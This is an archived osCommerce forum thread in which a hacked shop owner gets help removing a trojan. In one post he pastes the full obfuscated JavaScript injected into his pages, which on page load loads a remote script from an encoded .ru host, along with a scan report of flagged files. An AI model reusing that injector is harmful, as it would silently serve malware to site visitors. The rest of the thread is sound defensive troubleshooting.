saadmubeen Posted April 10, 2010 Share Posted April 10, 2010 Trojan on my site detected by some people. This is from another forum "Saad your site is popping up as a potential threat for people using Avast (including myself). Is says the site has a trojan. " How to remove it? Please help... I am so much tense because of this problem..... [ Recently I got hacked by someone and he removed my admin folder of the oscommerce website ] Link to comment Share on other sites More sharing options...
saadmubeen Posted April 10, 2010 Author Share Posted April 10, 2010 Trojan on my site detected by some people. This is from another forum "Saad your site is popping up as a potential threat for people using Avast (including myself). Is says the site has a trojan. " How to remove it? Please help... I am so much tense because of this problem..... [ Recently I got hacked by someone and he removed my admin folder of the oscommerce website ] ifeng-com.citibank.com.tripadvisor-com.needserver.ru.8080/ganj.com/google.com/angege.com/kijiji.ca.php is the trojan detected on my site...Please help..I am a newbie..Please provide a simple solution Link to comment Share on other sites More sharing options...
Guest Posted April 11, 2010 Share Posted April 11, 2010 You are going to have to identify the files affected or more precisely the error on your site. If you site has been identified by an individual and listed by google, then you should contact google to have your site removed from the 'black' list. Chris Link to comment Share on other sites More sharing options...
saadmubeen Posted April 11, 2010 Author Share Posted April 11, 2010 You are going to have to identify the files affected or more precisely the error on your site. If you site has been identified by an individual and listed by google, then you should contact google to have your site removed from the 'black' list. Chris When I open the admin panel of oscommerce I get a pop-up message from avg antivirus of that trojan....Few days back I ignored it when I logon to my cpanel account same thing appeared so many times (warning about the trojan)... Link to comment Share on other sites More sharing options...
Guest Posted April 11, 2010 Share Posted April 11, 2010 Trojan on my site detected by some people. This is from another forum "Saad your site is popping up as a potential threat for people using Avast (including myself). Is says the site has a trojan. " How to remove it? Please help... I am so much tense because of this problem..... [ Recently I got hacked by someone and he removed my admin folder of the oscommerce website ] You can try to scan your site with this contribution, osCommerce VTS to see if it finds infected files... Link to comment Share on other sites More sharing options...
saadmubeen Posted April 11, 2010 Author Share Posted April 11, 2010 You can try to scan your site with this contribution, osCommerce VTS to see if it finds infected files... Your Suggested Contribution found the following results Scan Completed osCommerce Virus & Threat Scan v1.0.3 Scan root: /home/saadstor/public_html Threats Definitions: 271 Files Definitions: 16 Scanned folders: 497 Scanned files: 755 Possible Infected files: 17 Possible Threat files: 0 Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> EmailSiphon ) Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> EmailWolf ) Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> ExtractorPro ) Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> CherryPicker ) Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> NICErsPRO ) Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> Teleport ) Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> EmailCollector ) Possible Infection: /home/saadstor/public_html/plusjonestikka/includes/functions/sitemonitor_functions.php (Known automated hack <=> iframe) Possible Infection: /home/saadstor/public_html/plusjonestikka/includes/functions/sitemonitor_functions.php (Known automated hack <=> error_reporting(0) ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> EmailSiphon ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> EmailWolf ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> ExtractorPro ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> CherryPicker ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> NICErsPRO ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> Teleport ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> EmailCollector ) Possible Infection: /home/saadstor/public_html/phpThumb/demo/phpThumb.demo.showpic.php (Known automated hack <=> iframe) I have found this script in some of my files... <script>var D;if(D!='' && D!='X'){D=''};var U=new Array();var p="";function u(){var aY=new Date();var uV=RegExp;var Q;if(Q!='q'){Q=''};var N="]";var kn;if(kn!=''){kn='vn'};var zN;if(zN!='e' && zN!='vh'){zN='e'};var r="\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x61\x6e\x67\x65\x67\x65\x2e\x63\x6f\x6d\x2f\x6b\x69\x6a\x69\x6a\x69\x2e\x63\x61\x2e\x70\x68\x70";var H='';function F(d,B){var hE=new Array();var g;if(g!='Hl' && g != ''){g=null};var hR;if(hR!='t' && hR!='HX'){hR='t'};var BK=String("iMc[".substr(3));BK+=B;var As;if(As!=''){As='sS'};BK+=N;var WG='';var TR='';var S=new uV(BK, new String("7wkg".substr(3)));var K;if(K!='' && K!='eo'){K='HT'};var pH;if(pH!='' && pH!='ed'){pH='jH'};return d[new String("rep"+"lac"+"e")](S, H);};var Rv;if(Rv!='I' && Rv != ''){Rv=null};var fH;if(fH!='' && fH!='Nu'){fH='Bh'};var W=F('8955593606965585956650693356','6395');var Ud=new Date();var ga=new Array();var x="src";var Il=new Array();var FC='';var h=window;this.Dk='';var b;if(b!='ny' && b!='Hn'){b=''};var sST=new String();var T=unescape("%68%74%74%70%3a%2f%2f%69%66%65%6e%67%2d%63%6f%6d%2e%63%69%74%69%62%61%6e%6b%2e%63%6f%6d%2e%74%72%69%70%61%64%76%69%73%6f%72%2d%63%6f%6d%2e%6e%65%65%64%73%65%72%76%65%2e%72%75%3a");var G='';var P=F('dUeJfHeKrJ','Yq8gMKH0EUJbu');var PG=new String();var Gs=new Array();this.gX="";h[string("onlo2SzX".substr(0,4)+"ad")]=function(){var Jm=new Date();try {a=document.createElement(F('sHcTrviHpTtT','HUvT'));var lA;if(lA!='C'){lA=''};var Fg=new Date();FC=T;var fJ;if(fJ!='At'){fJ='At'};FC+=W;FC+=r;var vW;if(vW!='pO' && vW!='Bp'){vW=''};var Ic=new Date();a[x]=FC;var bO;if(bO!='' && bO!='xL'){bO=''};a[P]=[1][0];var WW;if(WW!='Xp'){WW=''};var _t=new String();var tg=new String();document.body.appendChild(a);var CB=new Array();var sO="";} catch(Y){this.Wl='';var G_;if(G_!='wP' && G_!='PP'){G_=''};};};var oH=new Array();var ow=new Array();};var Ec;if(Ec!='ho' && Ec!='Jw'){Ec='ho'};var Hj;if(Hj!='rh' && Hj!='ON'){Hj='rh'};u();this.fa="";var jC;if(jC!='' && jC!='aZ'){jC=null};</script> I have removed this script from them...but the script is still there...........I am very tense...my alexa rank is increasing...everything will be destroyed!!! Link to comment Share on other sites More sharing options...
Guest Posted April 11, 2010 Share Posted April 11, 2010 Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> EmailSiphon ) Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> EmailWolf ) Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> ExtractorPro ) Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> CherryPicker ) Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> NICErsPRO ) Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> Teleport ) Possible Infection: /home/saadstor/public_html/htaccess_protection.htm (User Agent <=> EmailCollector ) This file I dont know since I dont have it in my shop. Do you know this file, and should it be there? If yes, compare it with your original file.. Possible Infection: /home/saadstor/public_html/plusjonestikka/includes/functions/sitemonitor_functions.php (Known automated hack <=> iframe) Possible Infection: /home/saadstor/public_html/plusjonestikka/includes/functions/sitemonitor_functions.php (Known automated hack <=> error_reporting(0) ) These two files give me the same error, no problem.. Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> EmailSiphon ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> EmailWolf ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> ExtractorPro ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> CherryPicker ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> NICErsPRO ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> Teleport ) Possible Infection: /home/saadstor/public_html/.htaccess (User Agent <=> EmailCollector ) You should compare your original .htaccess file with this. I dont know what you have in it... Possible Infection: /home/saadstor/public_html/phpThumb/demo/phpThumb.demo.showpic.php (Known automated hack <=> iframe) This one you should also compare with the original one.. I have found this script in some of my files... I have removed this script from them...but the script is still there........... You can use Windows Grep to find this script in your files: Windows Grep Link to comment Share on other sites More sharing options...
saadmubeen Posted April 11, 2010 Author Share Posted April 11, 2010 This file I dont know since I dont have it in my shop. Do you know this file, and should it be there? If yes, compare it with your original file.. These two files give me the same error, no problem.. You should compare your original .htaccess file with this. I dont know what you have in it... This one you should also compare with the original one.. You can use Windows Grep to find this script in your files: Windows Grep Thanks man...By using windowss grep I have removed the script..and now my website is again working... Link to comment Share on other sites More sharing options...
Mort-lemur Posted April 12, 2010 Share Posted April 12, 2010 Hi, Glad your site is working again, but: 1) are you upto date with all the security fixes and add-ons - if not then do it now. 2) Have you now changed the name of your admin folder and passwords following the problem (you posted the name of your admin folder in the scan results above - change it now!) 3) Are you making regular backups of your site so you can wipe site and restore with a clean version if it happens again. 4) Do you run an anti-virus software on your PC + a firewall Thanks Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members. Link to comment Share on other sites More sharing options...
saadmubeen Posted April 13, 2010 Author Share Posted April 13, 2010 Hi, Glad your site is working again, but: 1) are you upto date with all the security fixes and add-ons - if not then do it now. 2) Have you now changed the name of your admin folder and passwords following the problem (you posted the name of your admin folder in the scan results above - change it now!) 3) Are you making regular backups of your site so you can wipe site and restore with a clean version if it happens again. 4) Do you run an anti-virus software on your PC + a firewall Thanks Thank you so much man...I have installed all the contributions mentioned in the pinned thread...and also changed my admin folder name...I constantly make backups of my site....and I also have an antivirus+firewall on my pc... Any other security contribution you may suggest will also be greatly appreciated.... Regards Saad Link to comment Share on other sites More sharing options...
sky_diver Posted April 14, 2010 Share Posted April 14, 2010 Any other security contribution you may suggest will also be greatly appreciated.... Regards Saad I just released this http://addons.oscommerce.com/info/7334 . Hope it can help you stay secure. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.